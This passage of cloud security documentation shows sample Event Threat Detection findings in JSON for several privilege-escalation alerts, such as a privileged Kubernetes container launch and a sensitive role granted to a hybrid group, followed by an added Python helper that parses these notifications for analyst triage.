    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/025e0ba774da4d678883257cd125fc43",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME",
    "severity": "HIGH",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME",
    "display_name": "CLUSTER_NAME",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": [
      {
        "resourceFolderDisplayName": "FOLDER_NAME",
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "gke_control_plane",
      "subRuleName": "get_csr_with_compromised_bootstrap_credentials"
    },
    "detectionPriority": "LOW",
    "affectedResources": [
      { "gcpResourceName": "//k8s.io/certificates.k8s.io/v1/certificatesigningrequests" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1665577688",
            "nanos": 597107000
          },
          "insertId": "a189aaf0-90dc-4aaf-a48c-1daa850dd993"
        }
      }
    ],
    "properties": {},
    "findingId": "025e0ba774da4d678883257cd125fc43",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/tactics/TA0004/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-12T12:28:08.597107Z%22%0AinsertId%3D%22a189aaf0-90dc-4aaf-a48c-1daa850dd993%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}

Privilege Escalation: Impersonation Role Granted for Dormant Service Account

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "serviceName": "iam.googleapis.com",
      "methodName": "google.iam.admin.v1.SetIAMPolicy"
    },
    "assetDisplayName": "ASSET_DISPLAY_NAME",
    "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Privilege Escalation: Impersonation Role Granted for Dormant Service Account",
    "cloudDlpInspection": {},
    "contacts": {
      "security": {
        "contacts": [
          { "email": "EMAIL_ADDRESS_1" },
          { "email": "EMAIL_ADDRESS_2" }
        ]
      },
      "technical": {
        "contacts": [
          { "email": "EMAIL_ADDRESS_3" },
          { "email": "EMAIL_ADDRESS_4" }
        ]
      }
    },
    "createTime": "CREATE_TIMESTAMP",
    "database": {},
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "iamBindings": [
      {
        "action": "ADD",
        "role": "roles/iam.serviceAccountTokenCreator",
        "member": "IAM_Account_Who_Received_Impersonation_Role"
      }
    ],
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [ "VALID_ACCOUNTS", "CLOUD_ACCOUNTS" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//iam.googleapis.com/projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_ID",
    "severity": "MEDIUM",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//iam.googleapis.com/projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_ID",
    "display_name": "projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_EMAIL",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.iam.ServiceAccount",
    "folders": [
      {
        "resourceFolderDisplayName": "RESOURCE_FOLDER_DISPLAY_NAME",
        "resourceFolder": "RESOURCE_FOLDER_ID"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "impersonation_role_granted_over_dormant_sa" },
    "detectionPriority": "HIGH",
    "affectedResources": [
      { "gcpResourceName": "GOOGLE_CLOUD_RESOURCE_NAME" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1678897327",
            "nanos": 26483000
          },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1078/004/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "LINK_TO_LOG_QUERY"
        }
      ]
    }
  }
}

Privilege Escalation: Launch of privileged Kubernetes container

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": { "regionCode": "US" },
      "serviceName": "k8s.io",
      "methodName": "io.k8s.core.v1.pods.create"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/04206668443b45078d5b51c908ad87da",
    "category": "Privilege Escalation: Launch of privileged Kubernetes container",
    "contacts": {
      "technical": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" },
          { "email": "EMAIL_ADDRESS" },
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2022-10-08T21:43:41.145Z",
    "database": {},
    "eventTime": "2022-10-08T21:43:09.188Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kubernetes": {
      "pods": [
        {
          "ns": "default",
          "name": "POD_NAME",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_URI"
            }
          ]
        }
      ]
    },
    "mitreAttack": {},
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/04206668443b45078d5b51c908ad87da",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME",
    "severity": "LOW",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME",
    "display_name": "CLUSTER_NAME",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": [
      {
        "resourceFolderDisplayName": "FOLDER_NAME",
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "gke_control_plane",
      "subRuleName": "launch_privileged_container"
    },
    "detectionPriority": "LOW",
    "affectedResources": [
      { "gcpResourceName": "//k8s.io/core/v1/namespaces/default/pods/POD_NAME" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1665265389",
            "nanos": 188357000
          },
          "insertId": "98b6dfb7-05f6-4279-a902-7e18e815364c"
        }
      }
    ],
    "properties": {},
    "findingId": "04206668443b45078d5b51c908ad87da",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/tactics/TA0004/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222022-10-08T21:43:09.188357Z%22%0AinsertId%3D%2298b6dfb7-05f6-4279-a902-7e18e815364c%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}

Privilege Escalation: Privileged Group Opened To Public

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/groupSettings",
    "state": "ACTIVE",
    "category": "Privilege Escalation: Privileged Group Opened To Public",
    "sourceProperties": {
      "sourceId": {
        "organizationNumber": "ORGANIZATION_ID",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "persistence",
        "indicator": "audit_log",
        "ruleName": "privileged_group_opened_to_public"
      },
      "detectionPriority": "HIGH",
      "affectedResources": [
        { "gcpResourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/groupSettings" },
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "resourceContainer": "organizations/ORGANIZATION_ID",
            "timestamp": {
              "seconds": "1634774534",
              "nanos": 7.12E8
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "privilegedGroupOpenedToPublic": {
          "principalEmail": "PRINCIPAL_EMAIL",
          "groupName": "group:GROUP_NAME@ORGANIZATION_NAME",
          "sensitiveRoles": [
            {
              "resource": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
              "roleName": [ "ROLES" ]
            }
          ],
          "whoCanJoin": "ALLOW_EXTERNAL_MEMBERS"
        }
      },
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1078"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222021-10-21T00:02:14.712Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project="
          }
        ]
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-10-21T00:02:19.173Z",
    "createTime": "2021-10-21T00:02:20.099Z",
    "severity": "HIGH",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "findingClass": "THREAT"
  },
  "resource": {
    "name": "//admin.googleapis.com/organizations/ORGANIZATION_ID/groupSettings"
  }
}

Privilege Escalation: Sensitive Role Granted To Hybrid Group

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {},
      "serviceName": "cloudresourcemanager.googleapis.com",
      "methodName": "SetIamPolicy"
    },
    "assetDisplayName": "PROJECT_NAME",
    "assetId": "organizations/ORGANIZATION_NUMBER/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Privilege Escalation: Sensitive Role Granted To Hybrid Group",
    "contacts": {
      "technical": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" },
          { "email": "EMAIL_ADDRESS" },
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2022-12-22T00:31:58.242Z",
    "database": {},
    "eventTime": "2022-12-22T00:31:58.151Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "iamBindings": [
      {
        "action": "ADD",
        "role": "roles/iam.securityAdmin",
        "member": "group:GROUP_NAME@ORGANIZATION_NAME"
      }
    ],
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [ "VALID_ACCOUNTS", "CLOUD_ACCOUNTS" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "HIGH",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_NAME",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_NAME",
    "parent_name": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
    "parent_display_name": "FOLDER_ID",
    "type": "google.cloud.resourcemanager.Project",
    "folders": [
      {
        "resourceFolderDisplayName": "FOLDER_ID",
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "technique": "persistence",
      "indicator": "audit_log",
      "ruleName": "sensitive_role_to_group_with_external_member"
    },
    "detectionPriority": "HIGH",
    "affectedResources": [
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1671669114",
            "nanos": 715318000
          },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {
      "sensitiveRoleToHybridGroup": {
        "principalEmail": "PRINCIPAL_EMAIL",
        "groupName": "group:GROUP_NAME@ORGANIZATION_NAME",
        "bindingDeltas": [
          {
            "action": "ADD",
            "role": "roles/iam.securityAdmin",
            "member": "group:GROUP_NAME@ORGANIZATION_NAME"
          }
        ],
        "resourceName": "projects/PROJECT_ID"
      }
    },
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1078/004/"
      }
    }
  }
}
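
The privilege-escalation examples above share a few quirks that matter when you process them programmatically rather than in the console: the finding object is wrapped under either "findings" or "finding", sourceProperties sits at the top level in the newer notifications but inside the finding object in the Google Workspace ones, evidence timestamps arrive as a {seconds, nanos} pair in which seconds is a string and nanos is sometimes a float (6.73869E8), and some notifications carry only a LINK_TO_LOG_QUERY placeholder where the Cloud Logging link should be. The following Python triage helper is an added example, not code from the Google Cloud documentation or from Security Command Center; it reads only field paths visible in the examples above, reconstructs the Logs Explorer link in the same form as the contextUris.cloudLoggingQueryUri values shown (a format inferred from those values, not a documented API), and works on a constructed, trimmed copy of the "Creation of sensitive Kubernetes bindings" notification whose PROJECT_ID-style placeholders are the page's own.

```python
import json
from datetime import datetime, timezone
from urllib.parse import quote

# Constructed sample: a trimmed copy of the "Creation of sensitive Kubernetes bindings"
# notification above, keeping only the fields this helper reads. PRINCIPAL_EMAIL,
# PROJECT_ID and the other upper-case values are the page's placeholders, not real data.
SAMPLE_NOTIFICATION = json.loads("""
{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "serviceName": "k8s.io",
      "methodName": "io.k8s.authorization.rbac.v1.clusterrolebindings.create"
    },
    "category": "Privilege Escalation: Creation of sensitive Kubernetes bindings",
    "severity": "LOW",
    "kubernetes": {
      "bindings": [
        {"name": "cluster-admin", "role": {"kind": "CLUSTER_ROLE", "name": "cluster-admin"}}
      ]
    },
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/locations/us-west1-a/clusters/CLUSTER_NAME"
  },
  "sourceProperties": {
    "detectionCategory": {"ruleName": "gke_control_plane", "subRuleName": "create_sensitive_binding"},
    "evidence": [
      {"sourceLogId": {"projectId": "PROJECT_ID",
                       "timestamp": {"seconds": "1665480566", "nanos": 309136000},
                       "insertId": "e4b2fb24-a118-4d74-80ea-2ec069251321"}}
    ]
  }
}
""")


def finding_body(notification):
    """Return the finding object. The examples above wrap it under either
    "findings" or "finding" depending on the finding's age, so accept both."""
    for key in ("findings", "finding"):
        if key in notification:
            return notification[key]
    raise ValueError("notification carries no finding object")


def source_properties(notification):
    """sourceProperties is top-level in the newer examples and nested inside the
    finding object in the older Google Workspace ones; look in both places."""
    return notification.get("sourceProperties") or finding_body(notification).get("sourceProperties") or {}


def evidence_timestamp(source_log_id):
    """Render evidence[].sourceLogId.timestamp ({seconds, nanos}) as RFC 3339 with
    microseconds, which is how the Cloud Logging links above pin the entry. "seconds"
    is a string in the examples and "nanos" can arrive as a float such as 6.73869E8."""
    ts = source_log_id["timestamp"]
    seconds = int(ts["seconds"])
    nanos = int(float(ts.get("nanos", 0)))
    when = datetime.fromtimestamp(seconds, tz=timezone.utc).replace(microsecond=nanos // 1000)
    return when.strftime("%Y-%m-%dT%H:%M:%S.%fZ")


def cloud_logging_query_url(source_log_id):
    """Rebuild a Logs Explorer link for the exact audit log entry, in the same form as
    the contextUris.cloudLoggingQueryUri values shown above (format inferred from them).
    Organization-scoped evidence has no projectId, which yields the empty project filter
    the Workspace examples show."""
    project_id = source_log_id.get("projectId", "")
    query = (
        f'timestamp="{evidence_timestamp(source_log_id)}"\n'
        f'insertId="{source_log_id["insertId"]}"\n'
        f'resource.labels.project_id="{project_id}"'
    )
    return "https://console.cloud.google.com/logs/query;query=" + quote(query, safe=":") + f"?project={project_id}"


def triage_summary(notification):
    """Pull out what an analyst checks first: who did what to which resource, which
    rule fired, what privilege was granted, and a link to the originating log entry."""
    finding = finding_body(notification)
    access = finding.get("access", {})
    props = source_properties(notification)
    rule = props.get("detectionCategory", {})
    # IAM findings report the grant in iamBindings; GKE findings report RBAC bindings.
    granted = [f'{b.get("action")} {b.get("role")} to {b.get("member")}' for b in finding.get("iamBindings", [])]
    granted += [
        f'{b["role"]["kind"]} {b["role"]["name"]} via binding {b["name"]}'
        for b in finding.get("kubernetes", {}).get("bindings", [])
    ]
    return {
        "category": finding.get("category"),
        "severity": finding.get("severity"),
        "principal": access.get("principalEmail"),
        "caller_ip": access.get("callerIp"),
        "method": f'{access.get("serviceName")}:{access.get("methodName")}',
        "resource": finding.get("resourceName"),
        "rule": "/".join(part for part in (rule.get("ruleName"), rule.get("subRuleName")) if part),
        "granted": granted,
        "log_links": [cloud_logging_query_url(e["sourceLogId"]) for e in props.get("evidence", [])],
    }


if __name__ == "__main__":
    print(json.dumps(triage_summary(SAMPLE_NOTIFICATION), indent=2))
```

Run against the sample, the reconstructed link is byte-for-byte the one in the first example above, which is a useful self-check before pointing the helper at a Pub/Sub notification feed: if the two ever diverge, the timestamp rounding or encoding has drifted from what the console expects.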

What's next